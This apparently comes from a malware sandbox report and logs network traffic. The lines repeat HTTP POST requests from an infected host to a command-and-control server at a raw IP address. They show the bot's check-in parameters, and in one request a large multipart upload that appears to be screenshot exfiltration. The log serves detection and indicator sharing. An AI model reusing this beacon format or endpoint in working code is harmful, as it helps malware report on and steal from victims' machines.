                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTA1OTg3Host: 62.204.41.79Content-Length: 106139Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
